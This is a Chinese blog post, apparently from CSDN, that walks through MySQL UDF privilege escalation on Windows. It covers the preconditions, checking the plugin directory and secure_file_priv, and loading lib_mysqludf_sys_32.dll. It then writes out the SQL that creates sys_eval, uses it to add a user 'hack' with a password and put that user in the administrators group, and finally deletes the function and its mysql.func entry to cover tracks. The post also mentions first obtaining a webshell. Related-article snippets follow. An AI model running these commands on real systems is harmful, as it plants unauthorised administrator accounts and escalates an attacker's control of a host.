mysql提权源码_mysql提权

最新推荐文章于 2022-02-22 19:44:00 发布
最新推荐文章于 2022-02-22 19:44:00 发布
阅读量67 收藏
点赞数
文章标签: mysql提权源码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39989939/article/details/113951676
版权

0x01 原理

UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限

利用条件

Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。

Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。

掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。

可以将udf.dll写入到相应目录的权限。

dll链接

进行查看,这个目录也就是dll文件需要导入的目录,我们在拿到webshell后翻到数据库连接信息,蚁剑连接

c283e27d9ca7b2d5cb5496517a06d664.png

0x02 前提条件

关于plugin目录,可在mysql中执行

show variables like '%plugin%';

3b9317ee35a601e80ddc4890a3b9cf84.png

如果是远程的mysql并且有写入权限的话 (用@@secure_file_priv查看)只要返回不是NULL就有写权限,可以在my.ini加入secure_file_priv= 开启

0985d34d64b037fa477e56d5a78e296e.png

在5.1以上lib下面没有plugin目录所以要我们手工创建

0x03 利用方式

将dll文件导入到相应目录,如果导入错误会产生can`t open shared library错误

e7967e96d8352ffe4ee4da302e74ffc0.png

创建自定义函数

create function sys_eval returns string soname 'lib_mysqludf_sys_32.dll';

select sys_eval('net user hack yicunyiye123.. /add');

select sys_eval('net localgroup administrators hack /add');

drop function sys_eval; 删除函数

delete from mysql.func where name='sys_eval'; 删除函数

1.创建函数

7ec48798c16c6fad4201785c08f2a6d0.png

2.添加账户

f61edeb8c203612280acc8faae9fb158.png

3.添加至管理员组

ed5f368ea9747ecce74e590c0e9365c0.png

4.删除函数

882dc6d4d21cdf6e47cd93f0c302558c.png

07ea86decf033a9dbfa634f01ad50044.png

5.查看用户

665975fa0749cdcf412b004596ff3ed4.png

weixin_39989939
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql udf函数错误中断,关于MySQL出现Can't open shared library 'udf.dll'错误提示的研究...
weixin_30073141的博客
03-17 1012
关于MySQL出现Can't open shared library 'udf.dll'错误提示的研究2011-7-2 王健宇 转载UDF - User Defined Function 用户自定义函数 。mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能。但是对于UDF的具体限制,MYSQL的各个版本各有不同。 下面记录一下:听说(只是听说,没做测试),...
Mysql(udf提权)
Bu2n的博客
02-11 1010
Mysql udf提权前提步骤难点总结 Mysql udf提权 UDF UDFMySQL中用户定义的函数。这就像在DLL中编写自己的函数,然后在MySQL中调用它们。 前提 存在sql注入漏洞 Mysql文件写入读取权限security_file_priv值为空 数据库用户拥有文件读写权限 数据库用户允许其他主机连接 步骤 利用sql注入获取数据库用户名,密码,密码进行解密获得纯文本 使用osanda用户连接数据库 查看osanda用户的权限 select * from mysql.
mysql查询权限的代码_MySQL权限的详细解答_mysql
weixin_27875131的博客
02-19 260
一.权限表mysql数据库中的3个权限表:user 、db、 host权限表的存取过程是:1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中,存在则通过身份验证;2) 通过权限验证,进行权限分配时,按照user?db?tables_priv?columns_priv的顺序进行分配。即先检查全局权限表 user,如果user中对应的权限...
MySQL中用户与权限管理那些事(附带代码解析)
haust_允谦的博客
02-22 545
带你快速掌握MySQL用于与权限管理知识!
内网渗透之——mysql数据库提权之——UDF提权
wsnbbz的博客
03-11 1978
介绍 UDFmysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。 原理 UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf,必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能...
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
MySQL源码初探_mysql源码_piezca_MYSQL_
10-03
在《MySQL源码初探》中,我们将探讨MySQL的核心功能、架构设计以及源码解析的关键点。 首先,MySQL的核心功能包括数据存储、查询处理、事务管理、并发控制等。源码分析可以从以下几个层面展开: 1. **数据存储**:...
Mysql源码整理)_news4ep_mysql源码_MYSQL_
10-01
本资源包“Mysql源码整理_news4ep_mysql源码_MYSQL_”是数据库学习者在研究MySQL源码过程中的笔记和资料集合,旨在帮助用户更深入地了解MySQL的内部工作机制。 MySQL源码的学习可以从以下几个关键方面展开: 1. **...
MySQL.ODBC接口源码.zip_MYSQL_mysql c++_odbc _odbc mysql_odbc 连接mysql
最新发布
09-21
献给在查找这方面的人,,,,,,,简单的连接MYSQL,,,,曾经迷惑,,,,希望对在追寻的人有所帮助
mysql-5.7.38源码包及所需boost_1_59_0合集
08-02
-DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_UNIX_ADDR=/tmp/mysql.sock -DMYSQL_DATADIR=/data/mysql -DDOWNLOAD_BOOST=1 -DWITH_BOOST=../boost_1_59_0 -DSYSCONFDIR=/etc -DMYSQL_USER=mysql -DMYSQL_TCP_...
Mysql安装udf调用系统程序问题解决
暴烈骑士的专栏
12-05 7620
安装udf调用系统程序,在使用编译出的lib_mysqludf_sys.so遇到了 1. failed:FUNCTION ramsdb.sys_exec does not exist! 2. ERROR 1126 (HY000): Can’t open shared library ‘lib_mysqludf_sys.so’ 在此提供完整的安装过程
mysql使用udf提权技巧-应对can't open shared library 'udf.dll'
11-15 2035
对于can't open shared library 'udf.dll'相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037 apache+php+mysql+phpmyadmin搭建的ph
mysql提权提示can't open shared library 'udf.dll'解决办法
weixin_30343157的博客
03-27 1369
对于can't open shared library 'udf.dll'相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037apache+php+mysql+phpmyadmin搭建的php环境不能利用 5...
mysql提权提示(Can’t open shared library ‘udf.dll’)
huike008的博客
07-05 519
对于cant open shared library udf.dll相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037 apache+php+mysql+phpmyadmin搭建的php环境不能...
内网渗透学习03——权限提升分析与防御
box
02-22 3732
目录0x00 缺失补丁发现1. 命令查询补丁2. 工具查询补丁3. 其他补丁查询工具0x01数据库提权1. mysql数据库2. SQL Server 数据库提权3. Redis提权4. PostgreSql 数据库提权0x02 windows操作系统配置错误1. PowerUp2. AlwaysInstallElevated 提权3. Metasploit service_permissions利用4. 可信服务路径漏洞0x03 组策略首选项提权1. SYSVOL2. Group.xml3. 密码破解方式
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1138
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
python输入字符串列表_python-字符串,字典,列表
weixin_29171129的博客
02-21 1065
0x01 字符串python单双引号都可以str = "hello world"str_test = "yicunyiye"print(str,str_test)注释#单行注释"""多行注释"""input你输入了任何东西都强转成字符串输出str = "hello world"str_test = "yicunyiye"print(str,str_test)print("hello \n worl...
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
MySQL源码分析:揭秘mysqld_list_processes函数
"这篇文档主要介绍了服务端常用的一些MySQL命令,并深入到源码层面进行分析,特别是关于`show processlist`命令的实现细节。" 在MySQL服务器管理中,有一些常用的命令用于监控和诊断系统状态,其中包括: 1. `show...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值